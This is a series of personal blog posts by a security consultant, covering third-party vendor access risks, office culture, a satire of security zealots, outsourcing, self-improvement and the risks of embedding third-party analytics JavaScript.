In order to continue on the path of continual improvement, I feel fortunate that I maintained a relationship with the Ernst & Young partners and team, and they have been kind enough to offer me this opportunity.

Look forward to seeing you all in the near future…

-Jordan

I am going to skip all the audit items listed in an ISO standard as these can be downloaded and checked off as part of any security & risk baseline review. There are some pretty comprehensive audit documents up on the Isaca website and also papers in their journal!

Firstly, I want to lay out the scenery: You have engaged a third party vendor who has a dedicated site. They are to connect over a cloud using a VPN  tunnel (Internet, MPLS, IPLC). They come in through your third party connection DMZ (hopefully) where they are authenticated (2FA with tokens) and then authorised (AD, Novell, etc) where a virtual machine is pushed back using some middleware (Windows RPC, Citrix, Desktop Broker, XEN, etc). So in a nutshell it looks like this 

Third Party <-> Cloud <-> Organisation DMZ  <-> Organisation Applications & Databases

The third party has provided you with a slide deck that outlines how secure their site is…It probably goes a little something like this -> We have a global footprint and can “follow the sun” -> we are “IOS/IEC 27001:2005” certified- > our ODC/Production floor set up is a simple 1,2, 3, 4 process (no dramas as long as we dictate what you require) ->our networks are secure as we use “firewalls” and “virus scan” with an “IPS” -> our hardware is secure as they are “hardened” -> we follow all the high level security controls -> we have an in-built security team with “incident response”, DR and BCP options -> You know the spiel

Each one of the above items, both the infrastructure and the slides can easily be picked apart, but one section I really want to hone in on is something I raised at a Citrix education workshop a number of years ago.

Let’s assume you follow what the vendor has laid out for you above and you also have a highly secure vendor connection set-up. After all, you spent money having it designed by Architects, having it reviewed by Risk, having it penetration tested by Security, and finally having it audited by an external firm. This end-to-end remote connection infrastructure is tight!

But none of the above is really that important when you go and give the guys on the other end the keys to access your back-end systems. I guess I shouldn’t say it isn’t important, but more that it becomes superficial. Much like how a boat with an awesome motor is superficial when there is a hole in the bottom.

What I have noticed with a number of security/risk professionals is that once they start hearing those buzz words like firewall, VPN, 2FA, Citrix with lockdown, physically secure room, swipe card, guard on door, etc. They tick off the boxes on their audit checklist but forget to ask the holistic type of questions. Again, it is much like saying, motor…check, steering wheel…check, double bed with champagne…check, and forgetting to ask if there is a hole in the bottom because the water is still out of view.

As an example, the question I asked at the Citrix seminar was in regards to copying & pasting out of Citrix. Most people quickly assumed I was either an idiot and didn’t know about the options to disable this setting, as well as share drive mappings. They were more then happy to quickly proceed to wind bag about how the configuration settings should look. Again, it is that checklist mentality where I already know about the optional settings as I downloaded it too! Reciting my mums shopping list doesn’t show I am intelligent, it just shows I like to memorise things that could in fact just be written down.

Anyway, the question I was asking was broader…Although you can have all the secure settings enabled, what if the individual on the other end decides to screenshot from their laptop the information that is in their Citrix session?

Surprisingly (or not depending on your view), at the time when I reiterated the question for them, the room went silent. They hadn’t thought about this question before and as such didn’t have a checklist in memory to recite back. They were in a sense a program without a piece of code to execute…”DO NO COMPUTE”. As such, the question was brushed and we moved on.

I didn’t mind at the time, because all I was really doing was pressure testing the awareness of this issue. And what was discovered was a lack of awareness, or said in another way, ignorance. You see, in the above requirements set out by the third party, which you agreed too, they require access to their systems for general operational day-to-day processes. This includes things like, time sheets, intranet sites, FTP sites, Internet access, email access, etc.

So if by chance one of the third party agents decides to run a screen capturing tool all day long whilst performing their job (e.g., production support with customer details, development code with intellectual property, back office work with more customer details, etc), they can be gradually screen scraping this information out unbeknownst to you or the third party – You cannot see this occurring as you have already given them the keys to view this information to perform their job role. And the third party cannot see it as it is not a virus or an exploit of attack that will trigger the Anti-Virus or IPS – In short, you just got hosed.

I have plenty of other nice examples like the above, but this blog is long enough as it is. If ever you would like to discuss any of these, I am always available for a chat.

I just love this stuff… 

This post is specifically dedicated to all those who after spending many years within large companies and trying best to either kill the beast, conquer the beast, serve the beast, avoid the beast, confront the beast, or simply to find the beast and have always failed.

Today is your lucky day my friend, for today the beast shall be unmasked – Note that I am not talking about the business that occurs within an organisation, I am referring to that eerie feeling you get upon waking on Monday mornings knowing you face another long 5 day slug-a-thon at the office – The beast is the cause of this existential dread.

Also, this post about applying the above gem of knowledge appropriately so you don’t swing to far into indifference which leads to sloth, torpor and for the passive aggressive, repressed resentment.

You see, unfortunately for me (in the past), I viewed the beast of an organisation as some sort of system – It is most likely due to my computer science and information systems university background – Once you program in a language for a period of time, you begin to take this on as your world view and see the outside world as one’s and zero’s with variables and constants, etc. In the same sense, if you speak with a Buddhist monk, they may view the world as relatively dualistic with a pinch of infinity to create the world of maya.

Anyways, the point is, systems can be manipulated, they can be probed and with enough time and smarts hacked to ones advantage. But the beast of an organisation is an enigma  and is so well hidden it’s similar to a theologian trying to find God. Just when he thinks he has the case cracked, his thesis is splashed with an antithesis until someone comes along to find the synthesis. Unfortunately for them, the synthesis is just another name for a thesis and so the journey for God continues ad infinitum.

Arrggghhhh!!! I hear you say…If only I knew where this beast’s abode was, I would visit during the wee hours and slay him in his or possibly her bed. But alas, for this beast has no home, no sex and is beyond all your thoughts or scarier still is he, she, it behind them?

But before we get too carried away and either become paranoid or give up the ghost, I want to take you back to my mistake. I mistook the beast for a system, but in reality, the beast is not a system. So if it is not a system then what is it I hear you ask? If so, stupid questions will only result in stupid answers…

A better question would be why the beast?

Asking why is a great (and necessary) tool for finding the root cause of any situation. It is the best and possibly only tool for finding the unequivocal crux of the matter in a timely fashion.

To the best of my knowledge, why the beast appears to exist is to stem from a manifestation of evil peoples opinions. I specifically use the word evil here because evil begets evil and good begets good. They are, always were, and always will be mutually exclusive. So yes, it is right in saying evil minds produce evil opinions (which originate from evil hearts).

Note that we are no longer in the world of tangibles. We have crossed over from something we may have initially thought was tangible (i.e., we wanted to stick a knife in it) and are now in the realm of the intangible. In this realm, things can easily become confusing as this realm has different set of laws. That’s why metaphors really help in getting the message across, so here it goes…

Upon awaking one day, a man notices that it’s an overcast day. He hates gloomy days because they make him feel gloomy too. This morning is different for the man because he has decided to take this matter up with the shiny pie in the sky. Today is his day to wrestle with the sun.

There is no point going any further with this story as we know it is absurd and the man is an idiot. Not only for letting the weather dictate his mood, but the idea that wrestling with the sun could change the atmosphere.

You see, people who try and do blah to the beast are just like the man who tried to wrestle the sun. Whatever is the case, the atmosphere just is what it is. And if you haven’t figured it out yet, the atmosphere is the beast. It is the mood which is created by ignorant peoples opinions. Their egoistic attitudes are directly in conflict with your egoistic attitude causing that grating feeling of angst also known as disharmony. This disharmony is the cause of your routined morning existential angst resulting in you chasing a mirage. You see, the beast does not truly exist . It is a figment of your egotistic mind’s creation. Please note, it’s there, but whatever is created must also end, and as such, the beast can end too.

So now going back to the wheel analogy at the beginning of this post, I would like to reinvent the view of the wheel and add some specificity as an addendum to close out this post…

If you are not the General Manager or CEO, my advice is to take option 2 every time. Please remember that when recruiters call and offer great jobs that appear greener, remember to remember that the wheel is a pandemic – it is a monist pantheistic wheel – It’s an epidemic of disproportionate scales where you can never escape (as long as you work with other ignorant people). So once again, although you know yourself and what you feel to be right, know it, but go with the flow.

If you are a General Manager or CEO, my advice is that actions speak louder than words. Just as the Government would drop a bomp to clean up a breakout of an infectious disease that has gotten out of control, so too, you must step up and root out all the individuals affected with this disease. Bringing on new and fresh people prior to the extermination will only infect your new help, so if they are brought on early, ensure they are appropriately quarantined. Anything less than this, simply does not work.

- You are incapable of mingling outside the security clique due to the obvious fact everyone on the outside is suffering from some form of security “ignorance”. As such, they [the non-security personnel] would be incapable of understanding the intricacies of your stealthy security work, and any attempt to explain your “advanced” job would be futile. Simply by applying the thin slicing techniques you mastered from your security ways [also cannot be discussed], you have perfected the art in knowing that they will never understand the true essence of what you do.

- At social events you have been dragged along to by your partner, outsiders keep telling you information about themselves they shouldn’t. You know it wouldn’t be elite of you if you were to use this information against them, so you politely inform them about phishing exploits, facebook worms, social engineering and the like. Oh no, you’ve again performed another security faux pas and are trapped talking to these newbies about security 101, like patching your system and firewalls [oh, so 2001].

- You are certain that everyone else has somehow gotten it wrong and every day is an amazing feat to wake up and discover the world hasn’t ended in a cyberwar that is imminently about to happen. Thank God for hackers publishing unpatched exploits to make the world a safer place and annual retreats to Black Hat and Defcon to lift your spirits.

- Life and work are not about reducing risks to an acceptable level, it’s about eliminating all vulnerabilities and tinkling with the latest bleeding edge coolest tools if possible.

- If your job were a metaphor, other people would describe you as a stage gate or an angry police officer best left alone. You know deep down you are fighting the good fight and tough guys don’t cry.

- At every security conference, everyone so gets you and you so get them. There is an unbelievable amount of head nodding going on, you’re amazed they simply don’t fall off.

- In the office you are forever getting pumbled by the ever increasing sea of threats and yet nobody sees or understands quite what you are talking about. There is an unbelievable amount of head shaking going on, you’re amazed they simply don’t fall off.

- You make abusive calls to people who have spyware, malware, viruses on their laptop and who so foolishly jacked into your LAN [Note, not the corporate LAN as you now are the official caretaker - self appointed]. You request they immediately remove the laptop from the network and hang up without any further support – After all, you’re a secret crime fighter and have other fires to fight – To the bat cave.

- You know very well that the most efficient solution to reducing phishing is to call CERT and have them immediately bring down the hacked site. But if you went and did that, how would you ever get a chance to try out the latest phishing kits or reverse engineer code and show how cool and smart you are. Your quest for knowledge and cyberdome wisdom far out ways the common persons problems.

- You can make moral choices on other peoples behalf because you are security demi-god.

—–
OK, OK, that’s enough of my attempts at humor to belittle and poke fun at the ever hilarious security zealot. I hope the above didn’t upset anybody, but at least calls out some home truths about when good intentions don’t result in good outcomes…

—
One issue that came to mind when writing this and that I also find extremely interesting, is the current disconnect between security and the rest of the population (i.e., real world). Reading any recent security whitepaper or report, visiting security blogs, or attending any recent security conference only reiterates that the state of cybercrime is alarming. So why is it that [in a proportion of cases], only the security zealot cares?

Why isn’t this information concerning ever new emerging threats and constantly changing risks being communicated to the people it impacts and who are also in charge of the purse strings and can do something about it [CEO, CFO, CIO, COO, etc]?

In order to answer this question, I am going to turn it around on you. It is up to you to honestly look firstly at yourself and then your team. Have you the right information in the right format for your audience? Have you the right personality and right attitude for your audience?

As a recommendation in resolving this pandemic, raising the issue to be discussed by an appropriate representative, such as the CISO, at a board level would be worthwhile if you had the above boxes ticked off.

Good luck!

A major project I have been involved with for that better part of 3 years is in the wind down phase. As such, I will be looking around for opportunities to offer my services in the coming weeks.

I am looking for opportunities to offer my services in solving organisational problems. Interests include beginning a new project or assisting BAU whereby I can get involved in resolving organisational systemic and endemic issues. At the crux of it, I like to solve problems.

It is the synchronicity of the business requiring problems to be solved and me having the experience and skill-set to resolve the issues that I am in search of. In these cases, fulfilment and job satisfaction are gained from achieving results, whilst at the same time, appreciation is sown and grown with the business, by helping remediate their operational and technical quagmires.

Any expressions of interest can please contact jordan [at] securitytechscience [dot] com.

·          An individual is hired within a large company three tiers from the top in a well-respected position. Leveraging psychological testing, previous employment and the interview, the person is now known as passive and is clearly inexperienced to fulfil the role. They get hired because the person who hired them, their boss, intentionally chose this person, as they want to remain unaccountable. The boss is content on leaving the company running as is until their retirement, and especially on the executive pay packet they are receiving. They also need a fall guy too remain in such a cushy position if things ever went pear shaped prior to their planned ejection.

·          An individual finally becomes appointed an executive manager of a company at the expense of friends and family. They materially achieve everything above and beyond what they set out to acquire, but they are left feeling alienated with a greater sense of void within when not stressed at wits end.

Would you consider the above people successful? The first initially thinks they are successful, but soon realises they are in too deep and cannot control their surroundings – The job title no long matters when they realise they are just a pawn - The other reaches their potential at the cost of quality of life.

Obviously the above examples are missing something fundamental to be good examples of success. Looking closely at it, each exemplifies the success of something external – either the company or an external party - but where is the success for the individual. Taking these examples more personally, this post is about asking the question of what makes you a success?

Googling the three A’s, or if you have ever been to a self-success seminar – Please note I never have (not that there is anything wrong with going or not) – you would have heard about Acceptance, Approval and Appreciation of ideas to gain influence (ie. Power). That’s well and good, but I do not think this will ultimately fulfil you. Let’s be honest here, if you do not love what you do, if you do not have a passion or drive for what you are doing, you won’t be successful. The above A’s will be spotted a mile away as being put on, you’ll be ostracized as a phoney and thus not only unsuccessful, but uninfluential; Which was the intended point. I am not criticizing these three A’s, but am only saying that if you lack what lies underneath (ie. heart), then it is not only these 3 A’s that are superfluous, but any advice which is given to you.

So what three A’s am I talking about and how do they have heart? These are the key qualities I strive for in every day to support the team, and I also look for in other people to support me …

1.       Awareness – Consciously present and accepting the current situation at all times. Never dwelling too much on past successes or failures, and never too persistent about reaching the future. Attention to detail on what is important now.

2.       Attitude – Disposition towards positive thoughts and manner expressed in every action.

3.       Aptitude – Innate or acquired capability to achieve what they set out to do. Knowledge of when certain problems are beyond their capability and are happy to trust other people to perform this function.

Much more could be said about each of these three areas in greater detail, but if you simply keep them in the front of your mind (or write them down and keep them with you), and try and have them become a part of who you are, you will be a success at whatever you do. Why read copious amounts of how-tos when all you need to do is start being these qualities? The egoic mind hates that, it expects that you have to work hard for success and show everyone what a big success you are. Truthfully though, if you just are these qualities and you either accept, enjoy or love what you are being, that is success both within and without. 

In order not to go off the rails with such simple and useful advice, be sure to pressure test yourself every now and then. Enquire about what your current goals are (ie your vision), as this will be a guide for your current focal point. If this vision does not include the 3 A’s then you are “off the mark” again:

1.       Are you only focused on what others can do for you?

2.       Do you feel that you are more skilled than your other team members, and it is unfair they are on the same salary, as you clearly do more?

3.       Are you only concerned about your salary, or training, or a bonus, etc?

4.       Do you resent your boss as you are clearly more intelligent and know more than they do regarding your job?

5.       Do you resent others around you for being simple minded or different from you?

6.      Are you only satisified with competing with others and being the winner?

If you answer yes to any of the above, you are focusing on the wrong outcomes. You need to get back to the 3 A’s above, and try to apply them in daily life. In order to be less selfish, you need to give up on your opinions. That is, the current understanding of how you perceive the world in which you think you are right. Some times you do not realise that you are your own worst enemy when it comes to success.

The best question to as yourself is, am I successful now? If not, then everything (or the majority) of things you have done up to this point has not worked for you. This means letting go of your past opinions, your stubbornness, your emotional baggage, your ego, your previous unsuccessful conditionings and inviting the unknown into your life and simply seeing what happens.

Don’t just take my word for it, but be scientific and test the three A’s over a few weeks. Use it as a hypothesis in your daily thoughts and actions. For example, in your daily meetings, ask which has the better outcome…what you previously used to do or following the 3 A’s?

Finally, whatever has the better outcome, place this as the focal point of your consciousness and throw away the old. Once you have obtained somehting good, see if you can do it even better (without forcing), stop reading and go on and see what happens…

The biggest problem: The biggest problem with outsourcing is the perception from organisational owners that they can outsource their systemic problems. This, I would state too be a stupid and most pernicious illusion. Unfortunately it is far more common situation than most security professionals would hope to see.

Who does this impact: Everyone. This includes, Business Process Outsourcing (BPO), Information Technology Outsourcing (ITO), Knowledge Process Outsourcing (KPO) and any other acronym you come up with to cut “internal” jobs in order to achieve strategic advantage, cost savings and process improvements.

Solutions:

Awareness – Have the project managers build information sessions early on in the process where the owners (ie, business and system) are made aware that they are not outsourcing their systemic issues. That is, any issues are still their issues, as they are still the owners. Have the owners sign up.

Register – Operational Risk should at this stage work closely with the businesses to document all known system risks and also audit the current process in order to discover the unknown issues. Again, have the owners sign up.

Maintain Control of your Controls- Do not outsource your controls. In fact, you can’t, this is an illusion too. At the end of the day it is still part of the company no matter which way you dice and slice it. Therefore, keep the management of security internal. Note, you can outsource specialised skills but make sure you segregate this task to a separate 3rd party and not the 3rd party you are already outsourced to.

Monitoring – Perform regular ongoing auditing, monitoring and remediation of issues. With the owners taking responsibility of the issues and a Solid Governance Model you greatly reduce the inherent risks.

Closing Comments: I guess the key point to take away is accountability. If no one within the organisation takes ownership of the issues, even with the advantages of cost savings and possible process improvements, how long before one of these internal systemic issues results in signifcant impact to the company (e.g., brand damage), and then not only do the savings go out the window, but worst case the organisation as well.

This post is about addressing these issues, but could be expanded so as to be used for many more life situations, instead of IT Security. But of course, that choice is up to you…

In order to understand where the people above have gone off track, we need to have a clear(er) understanding of what a person is made up of (i.e., mind and body). I am of the understanding that the ancient and modern arts, sciences, religions, etc address enough about the mind body system to help people. The only constant is some people get it, the above ones have not, and this is not a rarity. Not surprising considering the pluralistic society in which we live in.

It’s not necessarily anybody’s fault – I don’t think we should see it in the light of right and wrong here – but just accept that we as humans are accountable for our own actions and deciding between being positive skepticism or negative cynicism is a choice, much like choosing to walk in the sun or walk in the shade. Other articles may discuss art, science experiments, religious beliefs, etc., but this article is about going straight to the source of the problem. You.

If you do not believe you are accountable for your own actions, or where you are in your life today, then you’re living in a delusional world. This post will mean nothing to you so you should probably just not bother reading beyond this point. If you agree you are accountable for your own actions, if you want to be alert and positive because you are aware the householder does not know at what hour the burglar will come then you should read on.

You may think that if it’s as easy as choosing to be positive instead of negative then I’ll just choose to be positive. People can say this and some just do it, but others end up going back to their old ways. Others who have been negative for a long period would most likely find it difficult to change their ways immediately and could employ a defense mechanism and say things like, it’s got nothing to do with me, or that just stupid, I know what I am doing, case closed. 

Now is the point where I have to call out that the following is going to get a little deep. The difference, I hope is that I do not want to be esoteric, so no haiku or parable. This is what I perceive to be simple logical steps that got me to this point. I am not pushing any “new age” idea, religion, because as I have said previously, the answers have already been provided in different formats. I just want to make it plain to you and put it in simple terms what I believe is known by many names such as “mind-body coordination”, “mind-body alignment”, etc., but are most likely all the same thing. When you read the below you could categorise parts as buddhist meditation, zen, taoism or say no that’s ki, chi or qi fundamentals. Preferably if you are going to make any judgement then call it psychology.  

At this junction, I think it is best if I just get to the point and give you the answer (as best as I understand it to be). As they say, a picture is worth a thousand words…

From the diagram, in short, mind moves the body. The mind (conscious/subconscious) directs intention, that guides your action, this leads to a bodily response that is interpreted by bodily senses, which the mind (conscious/subconscious) mind is aware of. 

As an easy example, let’s grab the coffee cup on the table. The mind says “grab the cup on the table”, the intention is generated by mind force guiding the arm to “grab the cup on the table”. Note that this is all non-physical or spiritual to this point. The arm reaches out and grabs the cup. The eyes see the cup has been grabbed and the fingers feel the cup in the hand and they relay this to the nervous system. Note that this section is physical to this point. Awareness of what just occurred is back in the non-physical realm.

If only life were so easy? I guess to name a few problems that occur in our daily lives just to illustrate why life can be complicated is in order. See how many you do…

1.  Instead of the mind generating an intention, the mind generates images known as your imagination. Freud would have called this Cathartic Energy. It occurs when your id or instinctual mind drives the idea like punching someone who has just made you angry, but your morals tell you otherwise. The energy has already been generated so must pass somewhere. As the super ego has blocked the intent, you instead imagine giving the guy one of your best beatings (using a Freudian world view).
2. The mind generates an intention but it is not a clear intention. As such, the body is guided down a different path than what was initially intended. Have you ever said to someone you love, “look, I know what I did, but that wasn’t my intention?”.
3. The mind generates a clear intention but you have bodily problems/limitations where you cannot physically achieve the desired response. Most people who dabble in sports would understand and relate to this one. That is, cannot drive like Tiger Woods or dunk like Michael Jordan.
4. The mind generates a clear intention but there is nerve damage and the response is misinterpreted and/or not interpreted at all by the body.

You may have noticed that each of the above points is a breakdown in the arrows within the diagram. From this point forward I will be focusing on point 2. If you can achieve point 2 then point 1 will eventually dissipate to occurring only rarely. Points 3 and 4 are physical issues that require either more training, acceptance of your genetic makeup or specialised medical assistance which I cannot help you with.

If you have made it this far, thank you. You are about to get to the interesting part so let’s begin with a question. If your mind has a desired intention, but after executing the action your awareness tells you something different from the original intention then which one is telling you the truth? Your Mind or your Awareness? Don’t cheat! Think about it…

For those who said Awareness, give yourselves a pat on the back. Not too much of a slap as you are only half right. The other half of the story is although awareness is more truthful than the mind, it is only a relative truth. To find the absolute truth is beyond the realm of this post as I am keeping the post only in the epistemological realm. 

For those who said Mind, I am sorry to say that your ego is lying to you. It wasn’t the bodies fault as it is guided by your intention. It wasn’t your intentions fault as it is generated by the mind. That’s right, that shadow lurking in the corner is your ego and she is a tricky little minx.

So what’s this got to do with “mind-body coordination” I hear you ask? Well, if you can align your mind, intention, body in order to achieve the desired action (as interpreted by your awareness), then you have achieved mind-body coordination/alignment. I do prefer this type of terminology as no-mind appears to me as a misnomer and/or misleading – It would be better to say ‘little idea’ with everything else empty (i.e., non cluttered mind).

So how would someone apply this in their daily life so as to remain positive (healthy skepticism) instead of negative (self centered cynicism)? My advice is to keep it simple. Ask yourself regularly, how am I feeling right now at this point in time. If you feel good and relaxed you’re on the right track. If not, it’s your mind that’s off track, so try again. Remember to keep saying to yourself there is always a better way. And when making decisions, don’t use your head, remember to ask yourself what does your gut tell you. Make sure to act on it and stop day dreaming. 

If you would like to take this further or improve honing your skill set, my suggestion is that you get yourself involved in something you enjoy doing and practice the above. I personally use the above in my martial arts training as I am involved in an intentional martial arts (i.e., internal/soft). I have found that on this path of discovery (which is still going), these things I learn in class spill out to my daily life. They make me a better person and hopefully it can do the same for you. Maybe you can discover like me how mind-body coordination just naturally results in selfless altruistic behaviour. Of course, as I am at a junior level, my ego trips me up every now and then more than I would like, but at least now I have the right tools to get back on the right path.  

Now, referring back to the SlashDot article listed above. Here is where the author is off track…

“(His job) constantly teaches him to focus on the negative side of life” – No, being negative or positive is a choice. By placing the fact you have chosen to be negative on your job (even if 99.9% of the population may do it) is a cop out. It is the mind projecting its negative intent onto an object. The object in this case being your job.

“As an auditor I search for errors that others have made and haughtily tell them” – Being haughty is a form of pride. Need I remind anyone of the seven deadly sins. Again, if you are choosing to be selfish instead of selfless, this is, at its basic layer choosing to be negative instead of positive.

“As a penetration tester I break systems that system engineers and administrators have laboriously built” – If the system admin was that laborious then I guess you wouldn’t really have broken in without some social engineering tactics. If you did, why would you be negative about this? You possibly found a new 0-day and could earn some extra money or help vendors code better systems by reporting it.

“I assume inside threats and have to be professionally suspicious.” – Really? Where is it written that we have to be professionally suspicious? If it’s on a security card somewhere, cool, where can I order one? I would say that it would be better to be cautious rather than distrustful. Wouldn’t you agree that as a security professional it is better to be on your guard?

“The security mindset surely helps me in my job” – Agree, me too.

“but is it good for me on the long run?” – In a 100 years when you are dead and buried what is it going to matter? Stop being so precious about yourself.

“What kind of influence has being an IT security professional had on your general attitude towards life?” – Me personally, I am stronger for it. You, I am not so sure about.

“What helps you stay out of pessimism and cynicism?” – Making the conscious choice of choosing to think and do positive things. Stop blaming everything else around you and begin by asking yourself what you maybe doing wrong.

“Is protecting existing things really as good as building new ones?” - All depends on what you are protecting and also what you are building.

“I always have to think about risks and identify all sorts of things that could go wrong.”  - That’s your job. There is no reason to be negative about it as it’s actually a pretty cool thing to get paid for.

I apologise in advance to the author of the Slashdot article if he takes offense to what I have written. But honestly, the truth hurts (when you are in the wrong), but you were the one who asked for a response. My advice is that if you are suffering in your current situation then you are thinking the wrong way. Changing your employer or your vocation won’t help you as this will not solve the core of the problem. You asked for help and if you understand what I am talking about in this post then the smartest thing you can do is laugh it off.

Note: Any “positive” comments on the above would be much appreciated as there could possibly be more arrows or more boxes in the above diagram, something that is incorrect, or requires further clarification…

Note: In the second paragraph, the person could be made up of more than mind-body, such as heart, soul, spirit, etc., but that is outside the scope of the above topic. Please keep all comments within the epistemological realm. 

Bula Everyone,

For those who have never been, I do highly recommend a trip to Fiji. I just came back from a week on Tokoriki Island off the coast of Nadi. I am highly refreshed and am ready to jump back into work and be more proactive with my security blogs…

Also, a very warm hello goes out to most of my friends at black hat. Thanks for the wake up call whilst you were all partying in Vegas but I only received the voice message when I got back (Golden Rule in Fiji: No Technology Allowed). 

Finally, I did receive some comments regarding the STS Scanner and why it lacked a number of plugins that I could easily write up. It’s true, I could easily write them up and I have with some other much more useful features, but I use this version for company use only. The online version is really just a baseline to teach people more about the ideas and frameworks that can be used to build a web application security scanner. It is not meant to be exhaustive with features and add-ons, as that may confuse the point of the tutorial and would most likely only be used by script kiddies. Of course, anyone who understands what I have coded can easily add more features on as that was the point of why I purposely made the tool extensible.

Vinaka

Businesses normally want to use these tools to report on the behavior of users who visit their site in order to improve customer experience and measure sales performance. All that is required is for the business to include an innocuous JavaScript tag (provided by the 3rd party) into each page they would like to measure. If the user allows javascript to be run, the script is run each time a user visits the website calling a more advanced script back on the 3rd party server.

For example, let’s say I provided a web analytics service and you used me as a 3rd party. I would provide you with the below script and then you would place the following tag on every page of your website…

<script src=http://www.securitytechsience.com/sts.js” type=”text/javascript”></script>

The sts.js script on my server would then run in the user’s browser every time a user visited your site . I would then provide you a log-in page that generates pretty reports for you to see how your user base is behaving.

Sounds great doesn’t it? Now for the risks…

NB: The below risks are applicable for companies that house more than just browser ware web applications.

Integrity of the script – Maybe the script is OK today but what about tomorrow?

How could you be assured that the 3rd party wouldn’t change it? What if the 3rd party server was hacked and replaced with malicious code by someone else? If a change were to occur how long before you would notice? If you did notice then what?

The above questions really hit home to three of the core functions of information security within any organisation…

1. Change control: If the 3rd party wanted to change the script then they should notify you and this would be input to your change control process.
2. Audit & Monitoring: The 3rd party should provide this, but you could just as easily write a script that does an hourly download of the script and compares it to your known good script.
3. Incident Response: If the script were to change without prior change control notification then there should be an incident response plan to follow.

Integrity of the 3rd Party

How could you be sure that the 3rd party uses a level of security practices that are aligned with your organisation? How could you be sure that if things did go wrong you were covered?

The above questions are concerned with a breadth of business units such as operational risk & compliance, legal as well as information security. They would include questions such as…

1. Is there a contract between the third party and the organisation?
2. Does the contract include x, y, z to cover the organisaion in the event of a, b, c?
3. Does the contract include a SAS70 or equivalent?
4. Does the contract in include a monetary figure?
5. Has privacy been considered?

In most (if not all) 3rd party contracts, the above questions favour the 3rd party and not you.

Confidentiality of the Data

How can your be certain that any confidential data remains secure? How is the data (both confidential and non-confidential) transferred?

Although you may be using SSL (ie, https), the 3rd party may not and the data is transferred via http. If this is the case, then any sensitive data passed is transferred across the Internet in the clear.

Even if you are using SSL and the 3rd party is using SSL (ie, https) as well, what if the javascript is requesting http GET requests? In that case, the URI and it’s parameters are passed over the Internet in clear text. For example,

GET https://www.example.com/cc_valid.js?credit_no=123412341234&date=31122008&ccv=123

And finally, do you really want an external script running anywhere near your customer’s sensitive information?

Problem

As you can see the above solution adds some considerable overhead if you want to implement it securely in order to protect your customers data and your company’s reputation. As a business the benefits that were promised at the beginning of sales pitch may not be sounding so great anymore and you may be leaning toward building a solution in-house. Although it is a secure solution, you soon find out it comes at a much higher cost. So is there an alternative solution?

Solution

I would recommend copying the 3rd party script on a local organisational server so that the control of the script is now with you. The company is now forced to contact you when they would like to update the script. You could go even further and ask that the reporting funcitonality is housed on your network. That is, you provide the box and they provide the application. If they won’t allow you to house the application you could always set up a B2B channel with the 3rd party in the cases where sensitive data may be transferred – This channel could be over a dedicated link or VPN using an IPSEC tunnel.